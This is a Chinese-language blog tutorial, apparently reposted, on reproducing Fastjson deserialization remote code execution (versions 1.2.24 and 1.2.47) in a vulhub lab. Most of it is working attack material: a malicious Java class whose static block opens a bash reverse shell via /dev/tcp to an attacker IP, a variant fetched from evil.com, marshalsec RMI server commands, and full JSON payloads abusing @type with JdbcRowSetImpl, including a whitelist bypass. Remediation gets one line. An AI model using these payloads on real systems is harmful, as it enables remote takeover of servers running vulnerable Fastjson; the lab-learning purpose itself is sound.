Java安全篇-Fastjson毛病

媒介知识：

一、json

概念：

json全称是JavaScript object notation。即JavaScript对象标志法，利用键值对举行信息的存储。
格式：

1. {
3.         "name":"wenda",
5.         "age":21,
7. }

复制代码

 作用：

JSON 可以作为一个对象大概字符串存在，前者用于解读 JSON 中的数据，后者用于通过网络传输 JSON 数据。这不是一个大事件——JavaScript 提供一个全局的 可访问的 JSON 对象来对这两种数据举行转换。
二、Fastjson毛病

原理：

Fastjson是一个由阿里巴巴开源的Java库，用于将 Java 对象转换成其 JSON 表示形式，也可以用来将 JSON 字符串转换成等效的 Java 对象，与原生的java反序列化相比，FastJson未利用readObject()方法举行反序列化，而是利用了自界说的一套方法，引进了AutoType功能，在反序列化的过程中，会读取到@type的内容，还调用getter和setter方法将JSON字符串还原成对象。，然而，@type的类有可能被恶意构造，只需要公道构造一个JSON，利用@type指定一个想要的攻击类库就可以实现攻击。
为何引进 AutoType功能：

即在序列化的时候，先把原始类型记录下来。利用@type的键记录原始类型，
指纹特性:

恣意抓个包，提交方式改为POST，花括号不闭合。返回包在就会出现fastjson字样
危害：

远程代码执行
影响版本：

影响版本：Fastjson1.2.24及之前版本。
代码审计：

参考
fastjson反序列化原理分析 - FreeBuf网络安全行业流派
复现：

Java安全篇--Fastjson1.2.24-RCE毛病

1.RMI攻击

RMI 全称 Remote Method Invocation，是 JAVA 实现远程过程调用的应用步伐编程接口，存储于 java.rmi 包中，利用期方法调用对象时，必须实现 Remote远程接口。它可以让客户机上运行的步伐调用远程服务器上的对象。而远程方法调用的特性可以让开发者可以或许在网络情况中分布操作。RMI 宗旨就是尽可能简化远程接口对象的利用。
REDEME.md

1. fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。
3. 参考资料：
5. - https://www.freebuf.com/vuls/208339.html
6. - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/
8. ## 漏洞环境
10. 运行测试环境：
12. ```
13. docker compose up -d
14. ```
16. 环境运行后，访问`http://your-ip:8090`即可看到JSON格式的输出。
18. 我们向这个地址POST一个JSON对象，即可更新服务端的信息：
20. ```
21. curl http://your-ip:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}'
22. ```
24. ## 漏洞复现
26. 因为目标环境是Java 8u102，没有`com.sun.jndi.rmi.object.trustURLCodebase`的限制，我们可以使用`com.sun.rowset.JdbcRowSetImpl`的利用链，借助JNDI注入来执行命令。
28. 首先编译并上传命令执行代码，如`http://evil.com/TouchFile.class`：
30. ```java
31. // javac TouchFile.java
32. import java.lang.Runtime;
33. import java.lang.Process;
35. public class TouchFile {
36.     static {
37.         try {
38.             Runtime rt = Runtime.getRuntime();
39.             String[] commands = {"touch", "/tmp/success"};
40.             Process pc = rt.exec(commands);
41.             pc.waitFor();
42.         } catch (Exception e) {
43.             // do nothing
44.         }
45.     }
46. }
47. ```
49. 然后我们借助[marshalsec](https://github.com/mbechler/marshalsec)项目，启动一个RMI服务器，监听9999端口，并制定加载远程类`TouchFile.class`：
51. ```shell
52. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://evil.com/#TouchFile" 9999
53. ```
55. 向靶场服务器发送Payload，带上RMI的地址：
57. ```
58. POST / HTTP/1.1
59. Host: your-ip:8090
60. Accept-Encoding: gzip, deflate
61. Accept: */*
62. Accept-Language: en
63. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
64. Connection: close
65. Content-Type: application/json
66. Content-Length: 160
68. {
69.     "b":{
70.         "@type":"com.sun.rowset.JdbcRowSetImpl",
71.         "dataSourceName":"rmi://evil.com:9999/TouchFile",
72.         "autoCommit":true
73.     }
74. }
75. ```
77. 可见，命令`touch /tmp/success`已成功执行：

复制代码

打开情况 抓包得到

 修改为POST传参 再修改type 和传入json数据 发现name变了

说明咱们就可以POST传参了  为后面传paylaod做准备
 在vulhub下的fastjson 1.2.24文件夹下保存以下代码为TouchFile.java文件
注意 这里的IP为你的攻击机IP

1. // javac TouchFile.java
2. import java.lang.Runtime;
3. import java.lang.Process;
5. public class TouchFile {
6.     static {
7.         try {
8.             Runtime rt = Runtime.getRuntime();
9.             String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/192.168.85.136/2333 0>&1"};
10.             Process pc = rt.exec(commands);
11.             pc.waitFor();
12.         } catch (Exception e) {
13.             // do nothing
14.         }
15.     }
16. }

复制代码

编译为.class文件  jdk情况为1.8 高情况实现不了远程调用

1. javac TouchFile.java

复制代码

把编译好的class文件传到kali(攻击机)中 ，可以选择scp下令复制
在class文件所在的目录，Python起一个http服务。用80端口启动http服务的下令为：

1. python3 -m http.server 80

复制代码

利用marshalsec工具（需要maven情况编译）启动RMI服务
 marshalsec工具下载地址

1. git clone https://github.com/mbechler/marshalsec

复制代码

安装maven

1. apt-get update
2. apt-get install maven

复制代码

进入marshalsec目录，执行如下下令举行编译。

1. mvn clean package -DskipTests

复制代码

 启动RMI服务

1. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.85.136:80/#TouchFile" 9999

复制代码

然后重新访问靶场 抓包修改为Content-Type为application/json，发送payload

1. POST / HTTP/1.1
3. Host: 192.168.85.129:8090
5. User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
7. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9. Accept-Language: en-US,en;q=0.5
11. Accept-Encoding: gzip, deflate, br
13. Connection: close
15. Upgrade-Insecure-Requests: 1
17. Content-Type: application/json
19. Content-Length: 170
23. {
25.     "b":{
29.         "@type":"com.sun.rowset.JdbcRowSetImpl",
33.         "dataSourceName":"rmi://192.168.85.136:9999/TouchFile",
37.         "autoCommit":true
39. }

复制代码

 httpserver收到请求，RMI服务器收到请求，复现乐成

此时应该已经完成了毛病复现，我们检测一下是否在tmp目录touch创建了文件successFrank即可。运行docker ps查看容器id 进入容器，执行

1. docker exec -it 容器id /bin/bash

复制代码

2.反弹shell攻击 

Fastjson反序列化毛病原理与毛病复现（CVE-2017-18349）_fastjson反序列化毛病cve-CSDN博客
3.修复方案：

 将Fastjson升级至最新版本
Fastjson反序列化毛病原理与毛病复现（基于vulhub，保姆级的详细教程）_fastjson毛病原理-CSDN博客
Java安全篇--Fastjson1.2.47-RCE毛病4

概念：

fastjson 于1.2.24 版本后增长了反序列化白名单。而在2019年6月，fastjson 又被爆出在fastjson< =1.2.47的版本中，攻击者可以利用特别构造的 json 字符串绕过白名单检测，乐成执行恣意下令
 其实这个毛病利用跟1.2.24差不多，就是最后上传的payload举行更改

1. { "name":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "x":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://ip:9999/Exploit", "autoCommit":true } }

复制代码

一文读懂面试官都在问的Fastjson毛病 - FreeBuf网络安全行业流派
fastjson 1.2.47 RCE毛病保姆级复现 - FreeBuf网络安全行业流派
修复方案：

升级至最新版本即可

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。